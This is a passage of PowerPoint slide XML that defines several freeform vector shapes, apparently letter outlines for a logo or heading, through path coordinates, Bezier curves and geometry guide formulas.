                        <a:pt x="880586" y="699516"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="896493" y="699516"/>
                        <a:pt x="905161" y="685324"/>
                        <a:pt x="906590" y="667512"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="924020" y="667512"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="922592" y="696754"/>
                        <a:pt x="905256" y="716947"/>
                        <a:pt x="880491" y="716947"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="849916" y="716947"/>
                        <a:pt x="831533" y="687896"/>
                        <a:pt x="831533" y="653034"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="831533" y="618173"/>
                        <a:pt x="849821" y="589121"/>
                        <a:pt x="880491" y="589121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="903542" y="589312"/>
                        <a:pt x="921639" y="604552"/>
                        <a:pt x="923830" y="630841"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="905923" y="630841"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="902875" y="616839"/>
                        <a:pt x="895350" y="606552"/>
                        <a:pt x="880491" y="606552"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="858584" y="606552"/>
                        <a:pt x="849440" y="629603"/>
                        <a:pt x="849440" y="653034"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="849630" y="676465"/>
                        <a:pt x="858774" y="699516"/>
                        <a:pt x="880586" y="699516"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="845820" y="742093"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="869442" y="742093"/>
                        <a:pt x="889254" y="757047"/>
                        <a:pt x="889254" y="785336"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="869442" y="785336"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="868490" y="767906"/>
                        <a:pt x="858679" y="761429"/>
                        <a:pt x="844963" y="761429"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="835724" y="761429"/>
                        <a:pt x="824198" y="765429"/>
                        <a:pt x="824198" y="779050"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="824198" y="788575"/>
                        <a:pt x="829628" y="793813"/>
                        <a:pt x="837724" y="796481"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="839438" y="797052"/>
                        <a:pt x="864584" y="804863"/>
                        <a:pt x="870395" y="806958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="885349" y="812292"/>
                        <a:pt x="892493" y="827437"/>
                        <a:pt x="892493" y="841438"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="892493" y="871823"/>
                        <a:pt x="869918" y="883920"/>
                        <a:pt x="847439" y="883920"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="821531" y="883920"/>
                        <a:pt x="800576" y="869156"/>
                        <a:pt x="800195" y="835533"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="820007" y="835533"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="820007" y="856393"/>
                        <a:pt x="832866" y="864584"/>
                        <a:pt x="848773" y="864584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="866204" y="864584"/>
                        <a:pt x="872776" y="854297"/>
                        <a:pt x="872776" y="844106"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="872776" y="833628"/>
                        <a:pt x="868013" y="829532"/>
                        <a:pt x="863441" y="827437"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="855536" y="823817"/>
                        <a:pt x="845153" y="821341"/>
                        <a:pt x="829628" y="816197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="810292" y="809911"/>
                        <a:pt x="804577" y="795909"/>
                        <a:pt x="804577" y="781812"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="804482" y="754856"/>
                        <a:pt x="825341" y="742093"/>
                        <a:pt x="845820" y="742093"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="816007" y="714089"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="797147" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750665" y="624364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750284" y="624364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750284" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733235" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="733235" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="752094" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="798767" y="681895"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="799052" y="681895"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="799052" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="816102" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="816102" y="714089"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="739331" y="745331"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="774287" y="745331"/>
                        <a:pt x="789337" y="775716"/>
                        <a:pt x="789337" y="813054"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="789337" y="850392"/>
                        <a:pt x="774287" y="880777"/>
                        <a:pt x="739331" y="880777"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="692372" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="692372" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="739331" y="745331"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="672275" y="782003"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="672275" y="808006"/>
                        <a:pt x="657225" y="814673"/>
                        <a:pt x="653510" y="816197"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="653510" y="816578"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="660368" y="817721"/>
                        <a:pt x="670370" y="823817"/>
                        <a:pt x="670370" y="845249"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="670370" y="860965"/>
                        <a:pt x="672275" y="875443"/>
                        <a:pt x="676561" y="880872"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="655320" y="880872"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="652272" y="874967"/>
                        <a:pt x="652272" y="867632"/>
                        <a:pt x="652272" y="860965"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="652272" y="836105"/>
                        <a:pt x="647986" y="825151"/>
                        <a:pt x="629698" y="825151"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="600456" y="825151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="600456" y="880967"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="580644" y="880967"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="580644" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="634746" y="745331"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="659511" y="745331"/>
                        <a:pt x="672275" y="759047"/>
                        <a:pt x="672275" y="782003"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="322136" y="880777"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="300895" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="290227" y="844963"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="244983" y="844963"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234315" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="213836" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257366" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278511" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="322136" y="880777"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1009840" y="642366"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1009840" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="958310" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="958310" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1014984" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1014984" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="940499" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="940499" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1014032" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1014032" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="958406" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="958406" y="642461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1009840" y="642461"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1107377" y="537020"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10954" y="537020"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10954" y="10954"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1107377" y="10954"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1107377" y="53702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53" name="자유형: 도형 85">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E14D12-F2CA-C644-B3D3-A7F523FFE670}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7569968" y="3174026"/>
                  <a:ext cx="28575" cy="57150"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17145 w 28575"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 28575"/>
                    <a:gd name="connsiteY1" fmla="*/ 58293 h 57150"/>
                    <a:gd name="connsiteX2" fmla="*/ 34576 w 28575"/>
                    <a:gd name="connsiteY2" fmla="*/ 58293 h 57150"/>
                    <a:gd name="connsiteX3" fmla="*/ 17621 w 28575"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 57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8575" h="57150">
                      <a:moveTo>
                        <a:pt x="17145" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="58293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34576" y="58293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17621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54" name="자유형: 도형 86">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78DC7860-6C15-A943-B3C4-61ECDCB734CF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7420426" y="2509086"/>
                  <a:ext cx="171450" cy="219075"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 93631 w 171450"/>
                    <a:gd name="connsiteY0" fmla="*/ 220028 h 219075"/>
                    <a:gd name="connsiteX1" fmla="*/ 176879 w 171450"/>
                    <a:gd name="connsiteY1" fmla="*/ 134969 h 219075"/>
                    <a:gd name="connsiteX2" fmla="*/ 143447 w 171450"/>
                    <a:gd name="connsiteY2" fmla="*/ 134969 h 219075"/>
                    <a:gd name="connsiteX3" fmla="*/ 93631 w 171450"/>
                    <a:gd name="connsiteY3" fmla="*/ 190024 h 219075"/>
                    <a:gd name="connsiteX4" fmla="*/ 34195 w 171450"/>
                    <a:gd name="connsiteY4" fmla="*/ 110014 h 219075"/>
                    <a:gd name="connsiteX5" fmla="*/ 93631 w 171450"/>
                    <a:gd name="connsiteY5" fmla="*/ 30004 h 219075"/>
                    <a:gd name="connsiteX6" fmla="*/ 142399 w 171450"/>
                    <a:gd name="connsiteY6" fmla="*/ 71819 h 219075"/>
                    <a:gd name="connsiteX7" fmla="*/ 176593 w 171450"/>
                    <a:gd name="connsiteY7" fmla="*/ 71819 h 219075"/>
                    <a:gd name="connsiteX8" fmla="*/ 93631 w 171450"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 219075"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 171450"/>
                    <a:gd name="connsiteY9" fmla="*/ 110014 h 219075"/>
                    <a:gd name="connsiteX10" fmla="*/ 93631 w 171450"/>
                    <a:gd name="connsiteY10" fmla="*/ 220028 h 2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1450" h="219075">
                      <a:moveTo>
                        <a:pt x="93631" y="220028"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="141065" y="220028"/>
                        <a:pt x="174117" y="185261"/>
                        <a:pt x="176879" y="134969"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="143447" y="134969"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="140684" y="165545"/>
                        <a:pt x="124016" y="190024"/>
                        <a:pt x="93631" y="190024"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51721" y="190024"/>
                        <a:pt x="34195" y="150305"/>
                        <a:pt x="34195" y="110014"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34195" y="69723"/>
                        <a:pt x="51721" y="30004"/>
                        <a:pt x="93631" y="30004"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122111" y="30004"/>
                        <a:pt x="136684" y="47625"/>
                        <a:pt x="142399" y="71819"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="176593" y="71819"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="172498" y="26479"/>
                        <a:pt x="137731" y="286"/>
                        <a:pt x="93631" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35052" y="0"/>
                        <a:pt x="0" y="50006"/>
                        <a:pt x="0" y="110014"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="170021"/>
                        <a:pt x="35052" y="220028"/>
                        <a:pt x="93631" y="220028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55" name="자유형: 도형 87">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E35333-C979-1C40-800C-00327821D03F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7606163" y="2514039"/>
                  <a:ext cx="171450" cy="209550"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 73438 w 171450"/>
                    <a:gd name="connsiteY0" fmla="*/ 210026 h 209550"/>
                    <a:gd name="connsiteX1" fmla="*/ 107632 w 171450"/>
                    <a:gd name="connsiteY1" fmla="*/ 210026 h 209550"/>
                    <a:gd name="connsiteX2" fmla="*/ 107632 w 171450"/>
                    <a:gd name="connsiteY2" fmla="*/ 127635 h 209550"/>
                    <a:gd name="connsiteX3" fmla="*/ 180785 w 171450"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX4" fmla="*/ 142399 w 171450"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX5" fmla="*/ 91440 w 171450"/>
                    <a:gd name="connsiteY5" fmla="*/ 94107 h 209550"/>
                    <a:gd name="connsiteX6" fmla="*/ 39719 w 171450"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 171450"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX8" fmla="*/ 73438 w 171450"/>
                    <a:gd name="connsiteY8" fmla="*/ 127635 h 209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71450" h="209550">
                      <a:moveTo>
                        <a:pt x="73438" y="210026"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="107632" y="210026"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="107632" y="127635"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="180785" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142399" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="91440" y="94107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="39719" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="73438" y="12763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56" name="자유형: 도형 88">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C1F6A3-D593-1249-987E-FB9CAC7BC194}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7806093" y="2514039"/>
                  <a:ext cx="161925" cy="209550"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 161925 w 161925"/>
                    <a:gd name="connsiteY0" fmla="*/ 151543 h 209550"/>
                    <a:gd name="connsiteX1" fmla="*/ 125254 w 161925"/>
                    <a:gd name="connsiteY1" fmla="*/ 97441 h 209550"/>
                    <a:gd name="connsiteX2" fmla="*/ 125254 w 161925"/>
                    <a:gd name="connsiteY2" fmla="*/ 96869 h 209550"/>
                    <a:gd name="connsiteX3" fmla="*/ 153162 w 161925"/>
                    <a:gd name="connsiteY3" fmla="*/ 52102 h 209550"/>
                    <a:gd name="connsiteX4" fmla="*/ 95059 w 161925"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 161925"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 161925"/>
                    <a:gd name="connsiteY6" fmla="*/ 210122 h 209550"/>
                    <a:gd name="connsiteX7" fmla="*/ 89821 w 161925"/>
                    <a:gd name="connsiteY7" fmla="*/ 210122 h 209550"/>
                    <a:gd name="connsiteX8" fmla="*/ 161925 w 161925"/>
                    <a:gd name="connsiteY8" fmla="*/ 151543 h 209550"/>
                    <a:gd name="connsiteX9" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY9" fmla="*/ 30004 h 209550"/>
                    <a:gd name="connsiteX10" fmla="*/ 90202 w 161925"/>
                    <a:gd name="connsiteY10" fmla="*/ 30004 h 209550"/>
                    <a:gd name="connsiteX11" fmla="*/ 118967 w 161925"/>
                    <a:gd name="connsiteY11" fmla="*/ 58865 h 209550"/>
                    <a:gd name="connsiteX12" fmla="*/ 90202 w 161925"/>
                    <a:gd name="connsiteY12" fmla="*/ 88011 h 209550"/>
                    <a:gd name="connsiteX13" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY13" fmla="*/ 88011 h 209550"/>
                    <a:gd name="connsiteX14" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY14" fmla="*/ 30004 h 209550"/>
                    <a:gd name="connsiteX15" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY15" fmla="*/ 114395 h 209550"/>
                    <a:gd name="connsiteX16" fmla="*/ 94869 w 161925"/>
                    <a:gd name="connsiteY16" fmla="*/ 114395 h 209550"/>
                    <a:gd name="connsiteX17" fmla="*/ 127730 w 161925"/>
                    <a:gd name="connsiteY17" fmla="*/ 146780 h 209550"/>
                    <a:gd name="connsiteX18" fmla="*/ 94869 w 161925"/>
                    <a:gd name="connsiteY18" fmla="*/ 180023 h 209550"/>
                    <a:gd name="connsiteX19" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY19" fmla="*/ 180023 h 209550"/>
                    <a:gd name="connsiteX20" fmla="*/ 34290 w 161925"/>
                    <a:gd name="connsiteY20" fmla="*/ 114395 h 209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61925" h="209550">
                      <a:moveTo>
                        <a:pt x="161925" y="151543"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="161925" y="122968"/>
                        <a:pt x="149066" y="102965"/>
                        <a:pt x="125254" y="97441"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="125254" y="96869"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="143065" y="88582"/>
                        <a:pt x="153162" y="73343"/>
                        <a:pt x="153162" y="52102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153162" y="17050"/>
                        <a:pt x="130111" y="0"/>
                        <a:pt x="95059" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210122"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89821" y="210122"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="140494" y="210026"/>
                        <a:pt x="161925" y="184499"/>
                        <a:pt x="161925" y="151543"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="34290" y="30004"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="90202" y="30004"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="108871" y="30004"/>
                        <a:pt x="118967" y="37624"/>
                        <a:pt x="118967" y="58865"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118967" y="77724"/>
                        <a:pt x="106680" y="88011"/>
                        <a:pt x="90202" y="88011"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="34290" y="88011"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34290" y="30004"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="34290" y="114395"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="94869" y="114395"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="115729" y="114395"/>
                        <a:pt x="127730" y="126206"/>
                        <a:pt x="127730" y="146780"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="127730" y="167926"/>
                        <a:pt x="115633" y="180023"/>
                        <a:pt x="94869" y="180023"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="34290" y="180023"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34290" y="11439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57" name="자유형: 도형 89">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8AC4D0D-3E3D-E540-8DA6-B180F0A04706}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7998974" y="2514039"/>
                  <a:ext cx="133350" cy="209550"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 142684 w 133350"/>
                    <a:gd name="connsiteY0" fmla="*/ 178308 h 209550"/>
                    <a:gd name="connsiteX1" fmla="*/ 34195 w 133350"/>
                    <a:gd name="connsiteY1" fmla="*/ 178308 h 209550"/>
                    <a:gd name="connsiteX2" fmla="*/ 34195 w 133350"/>
                    <a:gd name="connsiteY2" fmla="*/ 116777 h 209550"/>
                    <a:gd name="connsiteX3" fmla="*/ 132874 w 133350"/>
                    <a:gd name="connsiteY3" fmla="*/ 116777 h 209550"/>
                    <a:gd name="connsiteX4" fmla="*/ 132874 w 133350"/>
                    <a:gd name="connsiteY4" fmla="*/ 86773 h 209550"/>
                    <a:gd name="connsiteX5" fmla="*/ 34195 w 133350"/>
                    <a:gd name="connsiteY5" fmla="*/ 86773 h 209550"/>
                    <a:gd name="connsiteX6" fmla="*/ 34195 w 133350"/>
                    <a:gd name="connsiteY6" fmla="*/ 31718 h 209550"/>
                    <a:gd name="connsiteX7" fmla="*/ 140779 w 133350"/>
                    <a:gd name="connsiteY7" fmla="*/ 31718 h 209550"/>
                    <a:gd name="connsiteX8" fmla="*/ 140779 w 133350"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX9" fmla="*/ 0 w 133350"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 133350"/>
                    <a:gd name="connsiteY10" fmla="*/ 210026 h 209550"/>
                    <a:gd name="connsiteX11" fmla="*/ 142684 w 133350"/>
                    <a:gd name="connsiteY11" fmla="*/ 210026 h 209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3350" h="209550">
                      <a:moveTo>
                        <a:pt x="142684" y="178308"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="34195" y="178308"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34195" y="116777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132874" y="116777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132874" y="86773"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34195" y="86773"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34195" y="31718"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140779" y="31718"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="140779" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210026"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142684" y="21002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58" name="자유형: 도형 90">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3820B8E5-BDDD-BE45-BAF7-6DEA39C53A82}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8171377" y="2514039"/>
                  <a:ext cx="161925" cy="209550"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 34385 w 161925"/>
                    <a:gd name="connsiteY0" fmla="*/ 123539 h 209550"/>
                    <a:gd name="connsiteX1" fmla="*/ 84773 w 161925"/>
                    <a:gd name="connsiteY1" fmla="*/ 123539 h 209550"/>
                    <a:gd name="connsiteX2" fmla="*/ 123635 w 161925"/>
                    <a:gd name="connsiteY2" fmla="*/ 179165 h 209550"/>
                    <a:gd name="connsiteX3" fmla="*/ 128873 w 161925"/>
                    <a:gd name="connsiteY3" fmla="*/ 210026 h 209550"/>
                    <a:gd name="connsiteX4" fmla="*/ 165544 w 161925"/>
                    <a:gd name="connsiteY4" fmla="*/ 210026 h 209550"/>
                    <a:gd name="connsiteX5" fmla="*/ 154877 w 161925"/>
                    <a:gd name="connsiteY5" fmla="*/ 154686 h 209550"/>
                    <a:gd name="connsiteX6" fmla="*/ 125825 w 161925"/>
                    <a:gd name="connsiteY6" fmla="*/ 110300 h 209550"/>
                    <a:gd name="connsiteX7" fmla="*/ 125825 w 161925"/>
                    <a:gd name="connsiteY7" fmla="*/ 109728 h 209550"/>
                    <a:gd name="connsiteX8" fmla="*/ 158115 w 161925"/>
                    <a:gd name="connsiteY8" fmla="*/ 56769 h 209550"/>
                    <a:gd name="connsiteX9" fmla="*/ 93440 w 161925"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX10" fmla="*/ 0 w 161925"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 209550"/>
                    <a:gd name="connsiteX11" fmla="*/ 0 w 161925"/>
                    <a:gd name="connsiteY11" fmla="*/ 210122 h 209550"/>
                    <a:gd name="connsiteX12" fmla="*/ 34195 w 161925"/>
                    <a:gd name="connsiteY12" fmla="*/ 210122 h 209550"/>
